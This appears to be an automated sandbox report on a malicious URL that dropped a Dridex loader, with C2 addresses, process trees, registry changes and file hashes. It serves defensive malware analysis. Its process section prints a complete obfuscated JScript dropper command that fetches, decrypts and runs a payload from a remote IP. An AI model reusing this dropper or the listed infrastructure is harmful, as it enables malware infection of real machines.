Analysis
-
max time kernel
68s -
max time network
132s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
09-03-2021 05:04
Static task
static1
URLScan task
urlscan1
Sample
https://ankltrafficexit.xyz/trafficexit
General
Malware Config
Extracted
dridex
10111
188.165.17.91:8443
210.65.244.186:6601
Signatures
-
Processes:
resource yara_rule behavioral1/memory/2004-16-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr behavioral1/memory/2004-18-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 19 920 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
97cdn.exepid process 2004 97cdn.exe -
Loads dropped DLL 2 IoCs
Processes:
cmd.exepid process 1592 cmd.exe 1592 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "322035051" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C9EE3541-809D-11EB-ACC0-D2F6D50BABC0} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1020 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1020 iexplore.exe 1020 iexplore.exe 1972 IEXPLORE.EXE 1972 IEXPLORE.EXE 1972 IEXPLORE.EXE 1972 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 1020 wrote to memory of 1972 1020 iexplore.exe IEXPLORE.EXE PID 1020 wrote to memory of 1972 1020 iexplore.exe IEXPLORE.EXE PID 1020 wrote to memory of 1972 1020 iexplore.exe IEXPLORE.EXE PID 1020 wrote to memory of 1972 1020 iexplore.exe IEXPLORE.EXE PID 1972 wrote to memory of 748 1972 IEXPLORE.EXE cmd.exe PID 1972 wrote to memory of 748 1972 IEXPLORE.EXE cmd.exe PID 1972 wrote to memory of 748 1972 IEXPLORE.EXE cmd.exe PID 1972 wrote to memory of 748 1972 IEXPLORE.EXE cmd.exe PID 748 wrote to memory of 920 748 cmd.exe wscript.exe PID 748 wrote to memory of 920 748 cmd.exe wscript.exe PID 748 wrote to memory of 920 748 cmd.exe wscript.exe PID 748 wrote to memory of 920 748 cmd.exe wscript.exe PID 920 wrote to memory of 1592 920 wscript.exe cmd.exe PID 920 wrote to memory of 1592 920 wscript.exe cmd.exe PID 920 wrote to memory of 1592 920 wscript.exe cmd.exe PID 920 wrote to memory of 1592 920 wscript.exe cmd.exe PID 1592 wrote to memory of 2004 1592 cmd.exe 97cdn.exe PID 1592 wrote to memory of 2004 1592 cmd.exe 97cdn.exe PID 1592 wrote to memory of 2004 1592 cmd.exe 97cdn.exe PID 1592 wrote to memory of 2004 1592 cmd.exe 97cdn.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1020 CREDAT:275457 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinH"+"ttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://188.227.85.154/?MjczNjY5&LIjDHTF&s2ht4=Yn6rVCJ2veDSj2beIFxj38VndSTvVgfdOLq1UbgC-jgeDLgEOmMxZC1lE9LetzkWNylaYsJPW-R2JYg4W-5WWErI521zxzrVCdMMklBKC6jBTzekaUVgU5AlFn__IEqWbqUlzBkYxVVzKLZolpR_GVyPuMj13sfO5RDtxq-2T9bd3n5Md&oa1n4=x3rQcvWYaRyPCYjEM__dTaRBP0vYHliPxYq&oFfJdyLfANDAzOA==" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "cvbdfg" "http://188.227.85.154/?MjczNjY5&LIjDHTF&s2ht4=Yn6rVCJ2veDSj2beIFxj38VndSTvVgfdOLq1UbgC-jgeDLgEOmMxZC1lE9LetzkWNylaYsJPW-R2JYg4W-5WWErI521zxzrVCdMMklBKC6jBTzekaUVgU5AlFn__IEqWbqUlzBkYxVVzKLZolpR_GVyPuMj13sfO5RDtxq-2T9bd3n5Md&oa1n4=x3rQcvWYaRyPCYjEM__dTaRBP0vYHliPxYq&oFfJdyLfANDAzOA==" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c 97cdn.exe5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\97cdn.exe97cdn.exe6⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
a4bb59c8de49cba4e45264c4291a5e62
SHA1714a845dbe43fe4b8986d90e71416a375e88fec1
SHA2569e27abaae05890b0c15b01233d7667917912b67fd6aa04aea41a71dfc788aeb0
SHA5127829cd1bf077bcc7cf55e2bdb26d7fb4ffbfa7831ee2cb86faf7393637ba1e611fb0f845fba688d8d4c5e5d520d036da442d8f7af4121c8f475f9c17373f6e99
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
f4aad291df4a89703ec916807efe4351
SHA132a9c9b620196535122c02058169c84653c70cf1
SHA256460bd8959415a67455b88baf4dcb180cbb5894edb10b776b034fcb9085f2aeef
SHA5126444e945cc80c09170a92937761383f7dc2c07173a82d8ac27044765b85581b9180050dc7b128a7a9c17f412581e4b50272113d2036cfa01936761ba5a80c28d
-
C:\Users\Admin\AppData\Local\Temp\97cdn.exeMD5
5e97cb68bd9eccc5bd18b1787f429da3
SHA1b7aae2610b4e82899965bd86a5c1773a07c9538d
SHA25682ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf
SHA512cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1
-
C:\Users\Admin\AppData\Local\Temp\97cdn.exeMD5
5e97cb68bd9eccc5bd18b1787f429da3
SHA1b7aae2610b4e82899965bd86a5c1773a07c9538d
SHA25682ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf
SHA512cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4KWROTH2.txtMD5
e245831150a9e822fd35a00c1af79849
SHA16cf7cc634e6e670e461af5aa91af212f47e8b980
SHA256e2584d753253bc18399f270a13073e2e7963589a6762eeaf61852927bb58295f
SHA512ce7b3a7491c7f22da7efcbf5779deac6b6ba66ff50e309aba3f8eda694bc4fa68d8d069fa197351e7c1ceda020cfe4aeabc8491f658404ac73687418b77cf208
-
\Users\Admin\AppData\Local\Temp\97cdn.exeMD5
5e97cb68bd9eccc5bd18b1787f429da3
SHA1b7aae2610b4e82899965bd86a5c1773a07c9538d
SHA25682ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf
SHA512cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1
-
\Users\Admin\AppData\Local\Temp\97cdn.exeMD5
5e97cb68bd9eccc5bd18b1787f429da3
SHA1b7aae2610b4e82899965bd86a5c1773a07c9538d
SHA25682ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf
SHA512cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1
-
memory/748-4-0x0000000000000000-mapping.dmp
-
memory/920-9-0x00000000026D0000-0x00000000026D4000-memory.dmpFilesize
16KB
-
memory/920-7-0x00000000753E1000-0x00000000753E3000-memory.dmpFilesize
8KB
-
memory/920-5-0x0000000000000000-mapping.dmp
-
memory/1276-2-0x000007FEF5BD0000-0x000007FEF5E4A000-memory.dmpFilesize
2.5MB
-
memory/1592-8-0x0000000000000000-mapping.dmp
-
memory/1972-3-0x0000000000000000-mapping.dmp
-
memory/2004-13-0x0000000000000000-mapping.dmp
-
memory/2004-16-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/2004-17-0x0000000000220000-0x000000000025C000-memory.dmpFilesize
240KB
-
memory/2004-18-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB